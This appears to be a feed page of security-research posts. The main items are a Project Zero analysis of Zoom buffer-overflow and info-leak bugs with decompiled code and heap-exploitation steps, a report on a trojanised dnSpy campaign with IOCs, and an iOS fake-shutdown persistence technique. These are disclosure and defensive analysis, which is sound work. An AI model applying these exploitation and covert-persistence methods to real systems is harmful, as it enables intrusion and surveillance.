Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected], and provide your name, preferred contact email, and your time zone. It’s not a commitment on your part, you may change your mind later on, but it should be genuine, where the dates and topics work for you.

Also, if you have other classes you would be happy if I deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!

Rings

zodiacon

Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is a malware employed by the Threat Actor known as Ragnarok. The ransomware is responsible for files’ encryption and it is typically executed, by the actors themselves, on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found used by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Fake dnSpy - 当黑客也不讲伍德

By: liuchuang
12 January 2022 at 13:06

前景提要

dnSpy是一款流行的用于调试,修改和反编译.NET程序的工具。网络安全研究人员在分析 .NET 程序或恶意软件时经常使用。

2022 年1月8日, BLEEPING COMPUTER 发文称, 有攻击者利用恶意的dnSpy针对网络安全研究人员和开发人员发起了一次攻击活动。@MalwareHunterTeam 发布推文披露了分发恶意dnSpy编译版本的Github仓库地址,该版本的dnSpy后续会安装剪切板劫持器, Quasar RAT, 挖矿木马等。

image

image_1

查看 dnSpy 官方版的 Git,发现该工具处于Archived状态,在2020年就已经停止更新,并且没有官方站点。
2022-01-11-19-15-52

攻击者正是借助这一点,通过注册 dnspy[.]net 域名, 设计一个非常精美的网站, 来分发恶意的dnSpy 程序。
image_2
同时购买Google搜索广告, 使该站点在搜索引擎的结果排名前列,以加深影响范围。
2022-01-11-19-19-54

截止 2022 年 1 月 9 日, 该网站已下线

样本分析

dnspy[.]net 下发的为 dnSpy 6.1.8 的修改版,该版本也是官方发布的最后一个版本。

通过修改dnSpy核心模块之一的dnSpy.dll入口代码来完成感染。

dnSpy.dll正常的入口函数如下:

image_3

修改的入口添加了一个内存加载的可执行程序

image_4-1

该程序名为dnSpy Reader

image_5

并经过混淆

image_6

后续会通过mshta下发一些挖矿,剪切板劫持器,RAT等
2022-01-11-19-27-48

Github

攻击者创建的两个 github 分别为:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

其中使用的用户名为:isharpdev 和 carbonblackz,请记住这个名字待会儿我们还会看到它

资产拓线

通过对dnspy[.]net的分析,我们发现一些有趣的痕迹进而可对攻击者进行资产拓线:

dnspy.net

域名 dnspy[.]net 注册时间为2021年4月14日。

image_7

该域名存在多个解析记录, 多数为 Cloudflare 提供的 cdn 服务, 然而在查看具体历史解析记录时,我们发现在12月13日- 01月03日该域名使用的IP为45.32.253[.]0 , 与其他几个Cloudflare CDN服务的IP不同,该IP仅有少量的映射记录。

image_8

查询该IP的PDNS记录, 可以发现该IP映射的域名大多数都疑似为伪造的域名, 且大部分域名已经下线。

image_9

这批域名部分为黑客工具/办公软件等下载站点,且均疑似为某些正常网站的伪造域名。

2022-01-11-20-02-22

以及披露事件中的dnspy.net域名, 基于此行为模式,我们怀疑这些域名均为攻击者所拥有的资产,于是对这批域名进行了进一步的分析。

关联域名分析

toolbase[.]co 为例, 该域名历史为黑客工具下载站点, 该网站首页的黑客工具解压密码为 “CarbonBlackz”, 与上传恶意 dnspy 的 Github 用户之一的名字相同。

image_10

该站点后续更新页面标题为 Combolist-Cloud , 与45.32.253[.]0解析记录中存在的combolist.cloud域名记录相同, 部分文件使用 mediafire 或 gofile 进行分发。

image_11

该域名疑似为combolist[.]top的伪造站点, combolist[.]top 是一个提供泄露数据的论坛。

image_12

torfiles[.]net也同样为一个软件下载站。

image_13

Windows-software[.]co以及windows-softeware[.]net均为同一套模板创建的下载站。

image_14

image_15

shortbase[.]net拥有同dnspy[.]net一样的CyberPanel安装页面.且日期均为2021年12月19日。

image_16

下图为dnspy[.]net在WaybackMachine记录中的CyberPanel的历史安装页面。

image_17

coolmint[.]net同样为下载站, 截止 2022 年1月12日依然可以访问.但下载链接仅仅是跳转到mega[.]nz

image_18

filesr[.]nettoolbase[.]co为同一套模板

image_19

此站点的About us 都未做修改,

image_20

该页面的内容则是从FileCR[.]com的About us页面修改而来

2022-01-11-19-57-10

filesr[.]net的软件使用dropbox进行分发,但当前链接均已失效

最后是zippyfiles[.]net, 该站点为黑客工具下载站
2022-01-11-19-53-30
我们还在reddit上发现了一个名为tuki1986的用户两个月前一直在推广toolbase[.]cozippyfiles[.]net站点。

2022-01-11-20-41-21
该用户在一年前推广的网站为bigwarez[.]net

2022-01-11-20-58-43-1
查看该网站的历史记录发现同样为一个工具下载站点,且关联有多个社交媒体账号。

2022-01-12-21-03-15
推特@Bigwarez2

2022-01-11-21-05-11
Facebook@software.download.free.mana

2022-01-11-21-06-54

该账号现在推广的网站为itools[.]digital,是一个浏览器插件的下载站。
2022-01-11-21-18-54

Facebook组@free.software.bigwarez

2022-01-11-21-14-23

领英 - 当前已经无法访问
@free-software-1055261b9

tumblr@bigwarez

2022-01-11-21-12-50

继续分析tuki1986的记录发现了另一个网站blackos[.]net

2022-01-11-21-24-33

该网站同样为黑客工具下载站点

2022-01-11-21-27-38

且在威胁情报平台标注有后门软件

2022-01-12-01-33-08

通过该网站发现有一个名为sadoutlook1992的用户,从18年即开始在各种黑客论坛里发布挂马的黑客工具。

2022-01-12-01-39-59
2022-01-12-01-40-42
2022-01-12-01-41-27

在其最新的活动中,下载链接为zippyfiles[.]net

2022-01-12-01-43-26

从恶意的Gihubt仓库及解压密码可知有一个用户名为”CarbonBlackz”, 使用搜索引擎检索该字符串, 发现在知名的数据泄露网站raidforums[.]com有名为“Carbonblackz”的用户。

image_23

同样的在俄语的黑灰产论坛里也注册有账号,这两个账号均未发布任何帖子和回复,疑似还未投入使用。

image_24

其还在越南最大的论坛中发布软件下载链接:

image_25

image_26

归因分析

通过查看这些域名的WHOIS信息发现, filesr[.]net的联系邮箱为[email protected]

image_22

查询该邮箱的信息关联到一位35岁,疑似来自俄罗斯的人员。

2022-01-12-00-40-11

carbon1986tuki1986这两个ID来看,1986疑似为其出生年份,同时也符合35岁的年龄。

根据这些域名的关联性,行为模式与类似的推广方式,我们认为这些域名与dnspy[.]net的攻击者属于同一批人。

2022-01-12-02-45-11

这是一个经过精心构建的恶意组织,其至少从2018年10月即开始行动,通过注册大量的网站,提供挂马的黑客工具/破解软件下载,并在多个社交媒体上进行推广,从而感染黑客,安全研究人员,软件开发者等用户,后续进行挖矿,窃取加密货币或通过RAT软件窃取数据等恶意行为。

结论

破解软件挂马已经屡见不鲜,但对于安全研究人员的攻击则更容易中招,因为一些黑客工具,分析工具的敏感行为更容易被杀软查杀,所以部分安全研究人员可能会关闭防病毒软件来避免烦人的警告。

虽然目前该组织相关的恶意网站,gihub仓库以及用于分发恶意软件的链接大部分已经失效.但安全研究人员和开发人员还是要时刻保持警惕。对于各种破解/泄露的黑客工具建议在虚拟环境下运行,开发类软件,办公软件要从官网或正规渠道下载,且建议使用正版.以避免造成不必要的损失。

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d

  • ip
ip:
45.32.253.0

  • domain
zippyfiles.net
windows-software.net
filesr.net
coolmint.net
windows-software.co
dnspy.net
torfiles.net
combolist.cloud
toolbase.co
shortbase.net
blackos.net
bigwarez.net
buysixes.com
itools.digital
4api.net

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49
Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to discoveries of advanced detection and response mechanisms. ZecOps is proudly researching scenarios of attacks and sharing the information publicly for the benefit of all the mobile defenders out there.

iOs persistence is presumed to be the hardest bug to find. The attack surface is somewhat limited and constantly analyzed by Apple’s security teams.

Creativity is a key element of the hacker’s mindset. Persistence can be hard if the attackers play by the rules. As you may have guessed it already – attackers are not playing by the rules and everything is possible.

In part II of the Attacker’s Mindset blog we’ll go over the ultimate persistence bug: a bug that cannot be patched because it’s not exploiting any persistence bugs at all – only playing tricks with the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it’s still running. The “NoReboot” approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a “fake shutdown”. There is no user-interface or any button feedback until the user turns the phone back “on”.

To demonstrate this technique, we’ll show a remote microphone & camera accessed after “turning off” the phone, and “persisting” when the phone will get back to a “powered on” state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which among them is abusing our data and privacy. Constantly, our information is being collected, uploaded.

This story by Dan Goodin, speaks about an iOS malware discovered in-the-wild. One of the sentences in the article says: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”.

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by clicking on the Volume Down + Power button and dragging the slider.

Given that the iPhone has no internal fan and oftentimes it keeps its temperature cool, it’s not trivial to tell if our phones are running or not. For end-users, the most intuitive indicator that the phone is the feedback from the screen. We tap on the screen or click on the side button to wake up the screen.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.

In backboardd, we will hide the spinning wheel animation, which automatically appears when SpringBoard stops running, the magic spell which does that is [[BKSDefaults localDefaults]setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it, the device looks and feels as if it is not powered on. which is the perfect disguise for the purpose of mimicking a fake poweroff.

Example of SpringBoard respond to user’s interaction: Detects the long press action and evokes Siri

Despite that we disabled all physical feedback, the phone still remains fully functional and is capable of maintaining an active internet connection. The malicious actor could remotely manipulate the phone in a blatant way without worrying about being caught because the user is tricked into thinking that the phone is off, either being turned off by the victim or by malicious actors using “low battery” as an excuse. 

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. The system boot animation with Apple’s logo can convince the end-user to believe that the phone has been turned off. 

When SpringBoard is not on duty, backboardd is in charge of the screen. According to the description we found on theiphonewiki regarding backboardd.

Ref: https://www.theiphonewiki.com/wiki/Backboardd

